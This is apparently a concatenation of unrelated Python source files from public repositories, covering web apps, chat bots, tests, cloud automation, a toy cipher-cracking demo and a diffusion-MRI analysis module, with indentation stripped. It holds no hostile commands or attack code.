VIDEOS_EXCLUDE_TEMAS = ()
VIDEOS_EXCLUDE_CATEGORIAS = ()
VIDEOS_EXCLUDE_CORRESPONSALES = ()
VIDEOS_EXCLUDE_PAISES = ()
VIDEOS_EXCLUDE_SERIES = ()
try:
from local_settings import *
except ImportError:
pass
try:
from local_settings_es import *
except ImportError:
pass
| 768 |
app/__init__.py
|
sqoor/SeqGenSQL-ui
| 0 |
2023442
|
from flask import Flask
# from flask_sqlalchemy import SQLAlchemy
# from flask_migrate import Migrate
from config import Config
app = Flask(__name__)
app.config.from_object(Config)
# db = SQLAlchemy(app)
# migrate = Migrate(app, db)
from app import routes, models
| 266 |
tests/v2/test_menus.py
|
fabischolasi/fast-food-fast-v1
| 1 |
2023572
|
"""
This module facilitates testing
"""
import unittest
import os
import sys
import json
from tests.v2.base_setup import BaseTests
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
class MenuTests(BaseTests):
"""
This class contains tests for menu
"""
def test_get_all_menu(self):
"""
        This method tests if an admin successfully gets all menu items
"""
response = self.client().get('api/v2/menu')
self.assertEqual(response.status_code, 200)
def test_get_a_particular_menu(self):
"""
This method tests if an admin successfully gets a particular menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().get('api/v2/menu/1')
self.assertEqual(response.status_code, 200)
def test_get_a_particular_menu_that_doesnt_exist(self):
"""
        This method tests fetching a particular menu item that does not exist
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().get('api/v2/menu/2')
self.assertEqual(response.status_code, 200)
def test_admin_create_menu(self):
"""
This method tests a successful creation of menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
def test_admin_create_menu_that_already_exist(self):
"""
        This method tests creating a menu item that already exists
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
result = json.loads(response.data.decode('utf-8'))
self.assertEqual(result.get('message'), 'meal already in menu')
def test_admin_delete_a_particular_menu(self):
"""
This method tests successful deletion of a particular menu
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().delete('/api/v2/menu/1', headers=headers, content_type='application/json')
self.assertEqual(response.status_code, 200)
def test_admin_delete_a_particular_menu_that_doesnt_exist(self):
"""
        This method tests deleting a particular menu item that does not exist
"""
admin_response = self.logged_in_admin()
token = json.loads(admin_response.data.decode('utf-8'))['token']
headers = {'Content-Type': 'application/json', 'x-access-token': token}
response = self.client().post('/api/v2/meals', headers=headers, data=json.dumps({'mealname': 'chicken', 'price': 90}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().post('/api/v2/menu', headers=headers, data=json.dumps({'meal_id': 1}), content_type='application/json')
self.assertEqual(response.status_code, 201)
response = self.client().delete('/api/v2/menu/4', headers=headers, content_type='application/json')
self.assertEqual(response.status_code, 404)
if __name__ == '__main__':
unittest.main()
| 5,851 |
numba/tests/test_filter2d.py
|
aseyboldt/numba
| 1 |
2022975
|
#! /usr/bin/env python
# ______________________________________________________________________
'''test_filter2d
Test the filter2d() example from the PyCon'12 slide deck.
'''
# ______________________________________________________________________
import numpy
from numba import *
from numba.decorators import jit
import sys
import unittest
# ______________________________________________________________________
def filter2d(image, filt):
M, N = image.shape
Mf, Nf = filt.shape
Mf2 = Mf // 2
Nf2 = Nf // 2
result = numpy.zeros_like(image)
for i in range(Mf2, M - Mf2):
for j in range(Nf2, N - Nf2):
num = 0.0
for ii in range(Mf):
for jj in range(Nf):
num += (filt[Mf-1-ii, Nf-1-jj] * image[i-Mf2+ii, j-Nf2+jj])
result[i, j] = num
return result
# ______________________________________________________________________
class TestFilter2d(unittest.TestCase):
def test_vectorized_filter2d(self):
ufilter2d = jit(argtypes=[double[:,:], double[:,:]],
restype=double[:,:])(filter2d)
image = numpy.random.random((50, 50))
filt = numpy.random.random((5, 5))
filt /= filt.sum()
plain_old_result = filter2d(image, filt)
hot_new_result = ufilter2d(image, filt)
self.assertTrue((abs(plain_old_result - hot_new_result) < 1e-9).all())
# ______________________________________________________________________
if __name__ == "__main__":
TestFilter2d('test_vectorized_filter2d').debug()
# unittest.main(*sys.argv[1:])
# ______________________________________________________________________
# End of test_filter2d.py
| 1,721 |
examples/classify.py
|
butyess/retrodiff
| 0 |
2023131
|
import math
import logging
from functools import reduce
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import make_moons
from retrodiff.utils import GradientDescent, SVMBinaryLoss, NN
def plot(model, inputs, labels):
h = 0.25
x_min, x_max = inputs[:, 0].min() - 1, inputs[:, 0].max() + 1
y_min, y_max = inputs[:, 1].min() - 1, inputs[:, 1].max() + 1
xx, yy = np.meshgrid(np.arange(x_min, x_max, h),
np.arange(y_min, y_max, h))
input_mesh = np.c_[np.ravel(xx), np.ravel(yy)]
scores = model.evaluate(input_mesh)
Z = np.argmax(scores, axis=-1).reshape(xx.shape)
fig, ax = plt.subplots()
ax.contourf(xx, yy, Z, alpha=0.8, cmap=plt.cm.Spectral)
ax.scatter(inputs[:, 0], inputs[:, 1], c=labels, cmap=plt.cm.Spectral)
plt.show()
def main():
model = NN([2, 16, 16, 2])
model.set_loss(SVMBinaryLoss())
model.set_optim(GradientDescent(lr=0.001))
inputs, labels = make_moons(n_samples=100, shuffle=True, noise=0.1)
x_train = [x.reshape(1, -1) for x in inputs]
y_train = [y.reshape(1, -1) for y in labels]
x_test, y_test = make_moons(n_samples=100, shuffle=True, noise=0.1)
x_test = [x.reshape(1, -1) for x in x_test]
y_test = [y.reshape(1, -1) for y in y_test]
for e in range(10):
model.train(10, x_train, y_train)
print('epoch ', e, 'avg test loss: ', model.test(x_test, y_test))
plot(model, inputs, labels)
if __name__ == "__main__":
main()
| 1,509 |
pulumi/__main__.py
|
sio/gitlab-runners-fleet
| 0 |
2023587
|
'''Auto scaling fleet of GitLab CI runners'''
import os
import pulumi
from itertools import chain
import scaling
from destroy import cleanup
from instance import create, create_key
pulumi.log.debug('Create SSH key in cloud account')
key = create_key()
pulumi.log.debug('Calculate actions for existing instances')
actions = scaling.calculate_actions()
pulumi.log.debug('Execute cleanup actions on machines scheduled for deletion')
for status, instances in actions['DELETE'].items():
for instance in instances:
pulumi.log.info(f'Deleting instance {instance.name}: {status}')
try:
cleanup(instance, identity_file=os.environ['GITLAB_RUNNER_SSHKEY'])
except Exception:
pass
pulumi.log.debug('Create servers')
export = []
for status, instances in chain(actions['KEEP'].items(), actions['CREATE'].items()):
for instance in instances:
pulumi.log.debug(f'Create server: {instance.name}')
server = create(instance, depends_on=[key,])
export.append(dict(
name=instance.name,
cleanup=instance.cleanup or [
'sudo', '-u', 'gitlab-runner', '/etc/gitlab-runner-custom/unregister.sh'
],
ssh=server.ipv4_address.apply(lambda ip: f'op@{ip}'),
metrics=server.ipv4_address.apply(lambda ip: f'http://{ip}:8080/metrics'),
created_at=instance.created_at,
idle_since=instance.idle_since,
))
pulumi.log.debug('Export infrastructure snapshot')
pulumi.export(
os.environ['PULUMI_SNAPSHOT_OBJECT'],
sorted(
export,
key=lambda i: (i['created_at'], i['name']),
)
)
| 1,662 |
Genetic-algorithm-code-breaker.py
|
trik-flip/Genetic-algorithm-code-breaker
| 0 |
2022982
|
from BruteForce import Brute, Force
from Cryptic import decrypt, encrypt, key_generator
from Evo import Generation
PASSWORD_LENGTH = 2
POSSIBLE = [chr(65+x) for x in range(26)]  # creates a list with "A" through "Z"
# Text originates from Wikipedia
# Text has a maximum fitness of 441 points
plain_text = """Biologie is de natuurwetenschap die zich richt op levende organismen, levensprocessen en levensverschijnselen. De biologie omvat een breed scala aan vakgebieden waarin men onderzoek doet naar fysieke structuur, chemische processen, moleculaire interacties, fysiologische mechanismen, ecologische samenhang, ontwikkeling en evolutie. Biologie erkent de cel als de fysieke basiseenheid van het leven, genen als de basiseenheid van erfelijke informatie en evolutie als het mechanisme achter het ontstaan en het uitsterven van soorten. Levende organismen zijn open systemen die in staat zijn te overleven door bruikbare omzettingen van energie en door handhaving van hun vitale toestand.
Moderne biologie is overwegend een exacte natuurwetenschap, waardoor experimentele, kwantitatieve benaderingen en causale verklaringen centraal staan. Per vakgebied worden echter verschillende onderzoeksmethoden gehanteerd: wiskundige of theoretische biologie omvat de filosofie van de biologie en gebruikt wiskundige methoden om kwantitatieve modellen te formuleren. Experimentele biologie omvat omvat beschrijvend onderzoek en empirische benaderingen, waarin de geldigheid van voorgestelde theorieën wordt getest. Veel principes uit de biologie zijn gebaseerd op de toepassing van scheikundige en natuurkundige wetten op levende systemen.""" # noqa: disable pylama warning
text = "".join(plain_text.upper().split(" "))
# Create key, and encrypted text
key = key_generator(PASSWORD_LENGTH, POSSIBLE)
print(f"The Key is:{key}")
encrypted_text = encrypt(key, text)
# Start of program
my_choise = input(
"Whould you like to use \"{}\", \"{}\" or \"{}\"?".format(
"genetic algorithm[g]",
"brute force[b]",
"stop[S]"
))
if my_choise.upper() in ["G", "B"]:
if my_choise.upper() == "G":
# Using the genetic algorithm
gen = Generation(100, POSSIBLE, encrypted_text)
found_key = gen.start(PASSWORD_LENGTH)
else:
# Using the bruteforce method
brute = Brute(POSSIBLE, PASSWORD_LENGTH)
force = Force(brute)
found_key = force.start(encrypted_text)
# print the key
print(
"I think it's :{}\nKey:{}".format(
decrypt(found_key, encrypted_text), found_key))
| 2,561 |
src/jama/tools/clean_html.py
|
yejingyu/jama-slack-integration
| 1 |
2023666
|
# from bs4 import BeautifulSoup
import re
def remove_tags(html):
"""
Function will clean html by removing html tags leaving behind plaintext.
Args:
html (string): The html to be cleaned
Returns:
(string): The plaintext
"""
# return BeautifulSoup(html, "lxml").text
html = re.sub("<[^<]+?>", "", html)
html = re.sub(" ", " ", html)
html = re.sub(""", "\"", html)
html = re.sub("'", "'", html)
html = re.sub(">", "<", html)
return re.sub("<", ">", html)
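# Illustrative example (hypothetical input), assuming the entity replacements above:
#   remove_tags("<p>a &lt; b</p>")  ->  "a < b"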
| 538 |
tests/unit/conftest.py
|
brendanhasz/probflow-v2
| 2 |
2023437
|
"""Fixtures for unit tests."""
import pytest
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
import probflow as pf
# TODO: fixtures if you need them
"""
@pytest.fixture(scope="session")
def LR1_novar_unfit():
weight = Parameter(name='thing1')
bias = Parameter(name='thing2')
data = Input()
model = Normal(data*weight + bias, 1.0)
return model
"""
| 448 |
werewolf/models/user.py
|
LucienZhang/werewolf-back
| 0 |
2022844
|
from sqlalchemy import Column, Integer, String, Boolean
from .base import Base
class User(Base):
uid = Column(Integer, primary_key=True, autoincrement=True)
username = Column(String(length=255),
nullable=False, unique=True, index=True)
hashed_password = Column(String(length=255), nullable=False)
# login_token = Column(String(length=255), nullable=False, index=True)
nickname = Column(String(length=255), nullable=False)
avatar = Column(Integer, nullable=False)
gid = Column(Integer, nullable=False) # gid=-1 means not in game
is_active = Column(Boolean, nullable=False, default=True)
is_superuser = Column(Boolean, nullable=False, default=False)
| 726 |
airflow/contrib/operators/dataflow_operator.py
|
harrisjoseph/incubator-airflow
| 4 |
2023094
|
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from airflow.contrib.hooks.gcp_dataflow_hook import DataFlowHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class DataFlowJavaOperator(BaseOperator):
"""
Start a Java Cloud DataFlow batch job. The parameters of the operation
will be passed to the job.
It's a good practice to define dataflow_* parameters in the default_args of the dag
like the project, zone and staging location.
```
default_args = {
'dataflow_default_options': {
'project': 'my-gcp-project',
'zone': 'europe-west1-d',
'stagingLocation': 'gs://my-staging-bucket/staging/'
}
}
```
You need to pass the path to your dataflow as a file reference with the ``jar``
parameter, the jar needs to be a self executing jar. Use ``options`` to pass on
options to your job.
```
    t1 = DataFlowJavaOperator(
task_id='datapflow_example',
jar='{{var.value.gcp_dataflow_base}}pipeline/build/libs/pipeline-example-1.0.jar',
options={
'autoscalingAlgorithm': 'BASIC',
'maxNumWorkers': '50',
'start': '{{ds}}',
'partitionType': 'DAY'
},
dag=my-dag)
```
Both ``jar`` and ``options`` are templated so you can use variables in them.
"""
template_fields = ['options', 'jar']
ui_color = '#0273d4'
@apply_defaults
def __init__(
self,
jar,
dataflow_default_options=None,
options=None,
gcp_conn_id='google_cloud_default',
delegate_to=None,
*args,
**kwargs):
"""
Create a new DataFlowJavaOperator.
        For more detail about job submission have a look at the reference:
https://cloud.google.com/dataflow/pipelines/specifying-exec-params
:param jar: The reference to a self executing DataFlow jar.
:type jar: string
:param dataflow_default_options: Map of default job options.
:type dataflow_default_options: dict
:param options: Map of job specific options.
:type options: dict
:param gcp_conn_id: The connection ID to use connecting to Google Cloud Platform.
:type gcp_conn_id: string
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: string
"""
super(DataFlowJavaOperator, self).__init__(*args, **kwargs)
dataflow_default_options = dataflow_default_options or {}
options = options or {}
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.jar = jar
self.dataflow_default_options = dataflow_default_options
self.options = options
def execute(self, context):
hook = DataFlowHook(gcp_conn_id=self.gcp_conn_id, delegate_to=self.delegate_to)
dataflow_options = copy.copy(self.dataflow_default_options)
dataflow_options.update(self.options)
hook.start_java_dataflow(self.task_id, dataflow_options, self.jar)
| 3,784 |
Bot/fb_bot.py
|
FaHoLo/Pizza_delivery
| 0 |
2022941
|
import os
from dotenv import load_dotenv
from flask import Flask, request
import requests
import db_aps
import fb_cache
import fb_templates
import moltin_aps
app = Flask(__name__)
load_dotenv()
FACEBOOK_TOKEN = os.environ['PAGE_ACCESS_TOKEN']
DB = db_aps.get_database_connection()
@app.route('/', methods=['GET'])
def verify():
'''
    When verifying the webhook, Facebook will send a request to this address. It must be answered with VERIFY_TOKEN.
'''
if request.args.get('hub.mode') == 'subscribe' and request.args.get('hub.challenge'):
if not request.args.get('hub.verify_token') == os.environ['VERIFY_TOKEN']:
return 'Verification token mismatch', 403
return request.args['hub.challenge'], 200
return 'Hello world', 200
@app.route('/', methods=['POST'])
def webhook():
'''
    The main webhook that receives messages from Facebook and Moltin.
'''
if request.headers['User-Agent'] == 'moltin/integrations':
# webhook on moltin products and categories create/update/delete events
# TODO handle updates and choose cache action
if request.headers['X-Moltin-Secret-Key'] != os.environ['VERIFY_TOKEN']:
return 'Verification token mismatch', 403
fb_cache.update_cached_cards()
return 'ok', 200
data = request.get_json()
for entry in data['entry']:
for messaging_event in entry['messaging']:
postback = None
sender_id = messaging_event['sender']['id']
if messaging_event.get('message'):
message_text = messaging_event['message']['text']
if messaging_event.get('postback'):
message_text = messaging_event['postback']['title']
postback = messaging_event['postback']['payload']
handle_users_reply(sender_id, message_text, postback)
return 'ok', 200
def handle_users_reply(sender_id, message_text, postback=None):
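    # Dispatch on the user's stored state: the current state is kept in the DB
    # (as a bytes value) under the key "fb-<sender_id>", and every handler
    # returns the next state, which is persisted below.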
states_functions = {
'START': handle_start,
'MENU': handle_menu,
'CART': handle_cart,
}
recorded_state = DB.get(f'fb-{sender_id}')
if not recorded_state or recorded_state.decode('utf-8') not in states_functions.keys():
user_state = 'START'
else:
user_state = recorded_state.decode('utf-8')
if message_text == '/start':
user_state = 'START'
state_handler = states_functions[user_state]
next_state = state_handler(sender_id, message_text, postback)
DB.set(f'fb-{sender_id}', next_state)
def handle_start(recipient_id, message_text, postback):
send_menu(recipient_id)
return 'MENU'
def send_menu(recipient_id, category_id=None):
message_payload = fb_templates.collect_menu_message(recipient_id, category_id)
send_message(recipient_id, message_payload)
def send_message(recipient_id, message_payload):
params = {'access_token': FACEBOOK_TOKEN}
headers = {'Content-Type': 'application/json'}
request_content = {
'recipient': {
'id': recipient_id
},
'message': message_payload,
}
response = requests.post(
'https://graph.facebook.com/v7.0/me/messages',
params=params, headers=headers, json=request_content
)
response.raise_for_status()
def handle_menu(recipient_id, message_text, postback):
if postback in [category['id'] for category in moltin_aps.get_all_categories()]:
send_menu(recipient_id, postback)
elif message_text == 'Добавить в корзину':
add_pizza_to_cart(recipient_id, postback)
elif message_text == 'Корзина':
message = fb_templates.collect_cart_message(postback)
send_message(recipient_id, message)
return 'CART'
else:
send_menu(recipient_id)
return 'MENU'
def add_pizza_to_cart(recipient_id, product_id):
quantity = 1
moltin_aps.add_product_to_cart(f'fb-{recipient_id}', product_id, quantity)
pizza_name = moltin_aps.get_product_info(product_id)['name']
message = {'text': f'В корзину добавлена пицца «{pizza_name}»'}
send_message(recipient_id, message)
def handle_cart(recipient_id, message_text, postback):
if 'add' in postback:
pizza_id = postback.split(':')[-1]
add_pizza_to_cart(recipient_id, pizza_id)
elif 'remove' in postback:
item_id = postback.split(':')[-1]
moltin_aps.remove_item_from_cart(f'fb-{recipient_id}', item_id)
message = {'text': 'Пицца удалена из корзины'}
send_message(recipient_id, message)
else:
send_menu(recipient_id)
return 'MENU'
message = fb_templates.collect_cart_message(f'fb-{recipient_id}')
send_message(recipient_id, message)
return 'CART'
def check_db_for_cards():
keys = DB.keys()
if b'categories_card' not in keys:
fb_cache.update_cached_cards()
if __name__ == '__main__':
check_db_for_cards()
debug = os.getenv("DEBUG", "false").lower() in ['yes', '1', 'true']
app.run(debug=debug)
| 4,990 |
MuteAll/bot.py
|
zahid47/MuteAll-DiscordBot-Among-Us
| 10 |
2022847
|
import discord
import os
from MuteAll import events, utils, core
bot = discord.AutoShardedBot()
# sets status when the bot is ready
@bot.event
async def on_ready():
await events.on_ready(bot)
@bot.slash_command(name="ping", description="show latency of the bot")
async def ping(ctx: discord.ApplicationContext):
await ctx.respond(f"Pong! {round(bot.latency * 1000)} ms")
@bot.slash_command(name="help", description="get some help!")
async def help(ctx: discord.ApplicationContext):
await utils.help(ctx)
@bot.slash_command(name="mute", description="server mute people!")
async def mute(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
can_do = utils.can_do(ctx)
if can_do != "OK":
return await ctx.respond(can_do)
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="mute", members=members)
await ctx.respond("👍")
@bot.slash_command(name="unmute", description="unmute people!")
async def unmute(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="unmute", members=members)
await ctx.respond("👍")
@bot.slash_command(name="deafen", description="deafen people!")
async def deafen(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
can_do = utils.can_do(ctx)
if can_do != "OK":
return await ctx.respond(can_do)
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="deafen", members=members)
await ctx.respond("👍")
@bot.slash_command(name="undeafen", description="undeafen people!")
async def undeafen(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="undeafen", members=members)
await ctx.respond("👍")
@bot.slash_command(name="all", description="mute and deafen people!")
async def all(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
can_do = utils.can_do(ctx)
if can_do != "OK":
return await ctx.respond(can_do)
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="all", members=members)
await ctx.respond("👍")
@bot.slash_command(name="unall", description="unmute and undeafen people!")
async def unall(ctx: discord.ApplicationContext,
mentions: discord.Option(str, "mention user(s) or role(s)") = ""):
if len(mentions) == 0:
members = ctx.author.voice.channel.members
else:
members = utils.get_affected_users(ctx, mentions)
await core.do(ctx, task="unall", members=members)
await ctx.respond("👍")
@bot.slash_command(name="stats", description="show stats")
async def stats(ctx: discord.ApplicationContext):
await utils.stats(ctx, bot)
# DEPRECATED
# # respond a help msg when the bot joins a server
# @bot.event
# async def on_guild_join(guild):
# await events.on_guild_join(guild)
# @bot.command()
# async def changeprefix(ctx, prefix):
# await prefixes.changeprefix(ctx, prefix)
# @bot.command(aliases=["prefix"])
# async def viewprefix(ctx):
# await prefixes.viewprefix(ctx)
# @bot.command(aliases=["e", "E", "End"])
# async def end(ctx, *args):
# if len(args) == 0:
# members = ctx.author.voice.channel.members
# else:
# members = await utils.get_affected_users(ctx, args)
# await core.do(ctx, task="end", members=members)
# @bot.command(aliases=["udme", "Undeafenme"])
# async def undeafenme(ctx):
# await core.do(ctx, task="undeafen", members=[ctx.author])
# DEPRECATED
# run the bot
def run():
bot.run(os.getenv("DISCORD_TOKEN"))
| 4,407 |
PyDWI/core.py
|
gkaissis/PyDWI
| 4 |
2023507
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_core.ipynb (unless otherwise specified).
__all__ = ['show', 'ADC', 'kurtosis', 'SliceGroup', 'DWIDataset', 'get_ADC_map', 'get_DK_map', 'get_ADC_dataset',
'get_DKI_dataset', 'save_nii']
# Cell
import pydicom
import numpy as np
import nibabel as nib
from scipy.optimize import curve_fit
import matplotlib.pyplot as plt
from functools import partial
show = partial(plt.imshow, cmap="gray")
import pandas as pd
from tqdm import tqdm
from joblib import Parallel, delayed
from sklearn.linear_model import LinearRegression
import warnings
# Cell
def ADC(pixel, ADC, intercept):
return ADC*pixel + intercept
# Cell
def kurtosis(x, D, K):
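    # Diffusion-kurtosis signal model (log form): log(S(b)/S(b0)) = -b*D + (b^2 * D^2 * K) / 6.
    # curve_fit in get_DK_map fits D and K per voxel against this expression.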
return (-x * D) + ((x **2)* (D **2) * K/6)
# Cell
class SliceGroup():
'''Represents a logical group of slices. Should never be called directly.
'''
def __init__(self, df):
self.df = df
@property
def pixel_array(self):
return np.stack(self.df["pixels"])
def __len__(self):
return self.pixel_array.shape[0]
def __repr__(self):
return f"""SliceGroup at position {self.df["z_position"].unique()} with instance numbers {self.df["instance_no"].unique()},
b_values {self.df["b_value"].unique()} and {len(self)} slices."""
def show(self, figsize=(20,5)):
fig, ax = plt.subplots(ncols=len(self), figsize=figsize)
for i, axi, in enumerate(ax.flat):
fig.suptitle(f"""Slice position {self.df["z_position"].unique()}""")
ax[i].imshow(self.pixel_array[i], cmap="gray")
ax[i].set_title(f"""b {self.df["b_value"].unique()[i]}, instance_no {self.df["instance_no"].unique()[i]}""")
# Cell
class DWIDataset():
'''Represents a DWI dataset from a multiframe DICOM. On loading, the dataset is rescaled and
broken up into SliceGroups which represent one slice acquired with different b-values.
Get information about the Dataset by calling .info.
'''
def __init__(self, filepath):
self.filepath = filepath
self.dataset = pydicom.dcmread(filepath)
print("Loading and rescaling...")
self.pixel_array = self.dataset.pixel_array *self.rescale_slope + self.rescale_intercept
self.df = self._get_logical_groups()
print("Successfully loaded Dataset")
@property
def rescale_slope(self):
rs = set([float(self.dataset.PerFrameFunctionalGroupsSequence[i].PixelValueTransformationSequence[0].RescaleSlope)
for i in range(len(self))])
if not len(rs) == 1:
raise ValueError("More than one rescale slope detected. Processing failed.")
return rs.pop()
@property
def rescale_intercept(self):
rs = set([float(self.dataset.PerFrameFunctionalGroupsSequence[i].PixelValueTransformationSequence[0].RescaleIntercept)
for i in range(len(self))])
if not len(rs) == 1:
raise ValueError("More than one rescale intercept detected. Processing failed.")
return rs.pop()
def __len__(self):
return int(self.dataset.NumberOfFrames.real)
def _get_logical_groups(self):
d = dict()
func_grps = [self.dataset.PerFrameFunctionalGroupsSequence[i] for i in range(len(self))]
instance_nums = [int(grp["2005", "140f"][0]["InstanceNumber"].value) for grp in func_grps]
z_positions = [(round(grp["0020", "9113"][0]["ImagePositionPatient"].value[-1], 2)) for grp in func_grps]
b_values = [(int(grp.MRDiffusionSequence[0].DiffusionBValue)) for grp in func_grps]
pixs = [ar for ar in self.pixel_array]
return pd.DataFrame([z_positions, instance_nums, b_values, pixs], index=["z_position", "instance_no", "b_value","pixels"]).T
@property
def slice_groups(self):
'''Contains the logical slice groups of same
position slices acquired at different b values.
'''
grps = []
for position in np.unique(self.df["z_position"]):
grps.append(SliceGroup(self.df[self.df["z_position"]==position]))
return grps
@property
def info(self):
return f'''DICOMDataset with {len(self.pixel_array)} slices in groups of {len(self.df["b_value"].unique())} slices each
rescaled with slope {self.rescale_slope:.4f} and intercept {self.rescale_intercept:.4f}.'''
def __repr__(self):
return self.info
# Cell
def get_ADC_map(dataset, bvals="full", diagnostics=False, n_jobs=1):
'''Fast ADC map calculation from a given dataset.
b_vals="full" uses all b-values, "reduced" uses up to b600.
diagnostics=True returns the R-squared value.
n_jobs determines how many processes to use. -1 is all available.
'''
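    # Mono-exponential model: S(b) ~ S(b50) * exp(-b * ADC), so log(S(b)/S(b50)) is
    # linear in b; the fitted slope, scaled by -1e3, is returned as the ADC map.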
lr = LinearRegression(n_jobs=n_jobs)
denominator = dataset[1,...] #b50
if bvals=="full":
numerator = dataset[1:,...]
x = np.array([50,300,600,1000]).reshape(-1,1)
elif bvals=="reduced":
numerator = dataset[1:4,...] #b50-600
x = np.array([50,300,600]).reshape(-1,1)
else: raise ValueError("""Supported options are 'full' or 'reduced'""")
ar = np.nan_to_num(np.log(numerator/denominator), nan=0, posinf=0, neginf=0
).reshape(numerator.shape[0], numerator.shape[1]*numerator.shape[2])
result = (lr.fit(x, ar).coef_).squeeze() * (-1e3)
score = lr.score(x, ar)
if diagnostics:
return result.reshape(dataset.shape[1], dataset.shape[2]), score
return result.reshape(dataset.shape[1], dataset.shape[2])
# Cell
def get_DK_map(dataset, p0=None, bounds=((1e-5, 1e-2), (4e-3, 2))):
'''Produces a D and a K-map using b-values 50,300, 600 and 1000.
p0 and bounds are passed to curve_fit
'''
denominator = dataset[1,...] #b50
numerator = dataset[1:,...] #b50-1000
ar = np.nan_to_num(np.log(numerator/denominator), nan=0, posinf=0, neginf=0)
D_map = np.zeros(shape=(ar.shape[1], ar.shape[2]))
K_map = np.ones(shape=(ar.shape[1], ar.shape[2]))
x = [50,300,600,1000]
for xx in range(ar.shape[1]):
for yy in range(ar.shape[2]):
if ar[:, xx, yy].sum() == 0 or np.all(ar[:,xx,yy] == ar[0,xx,yy]):
                continue
try:
result = curve_fit(kurtosis, x, ar[:, xx, yy], p0=p0, bounds=bounds)[0]
except:
result = (0, 0)
D_map[xx, yy] = result[0]*1e3
K_map[xx, yy] = result[1]
return (D_map, K_map)
# Cell
def get_ADC_dataset(dwi_dataset, n_jobs=-1, bvals="full", diagnostics=False, suppress_warnings=True):
if suppress_warnings:
with warnings.catch_warnings():
warnings.simplefilter("ignore")
adc = np.array([get_ADC_map(slice_group.pixel_array, n_jobs=n_jobs,
bvals=bvals, diagnostics=diagnostics)
for slice_group in dwi_dataset.slice_groups])
else:
adc = np.array([get_ADC_map(slice_group.pixel_array, n_jobs=n_jobs,
bvals=bvals, diagnostics=diagnostics)
for slice_group in dwi_dataset.slice_groups])
return adc
# Cell
def get_DKI_dataset(dwi_dataset, n_jobs=-1, verbose=1):
DKI_maps = Parallel(n_jobs=n_jobs, verbose=verbose)(delayed(get_DK_map)(slice_group.pixel_array)
for slice_group in dwi_dataset.slice_groups)
DMaps = np.array(DKI_maps)[:,0,...]
KMaps = np.array(DKI_maps)[:,1,...]
return DMaps, KMaps
# Cell
def save_nii(ar, filename):
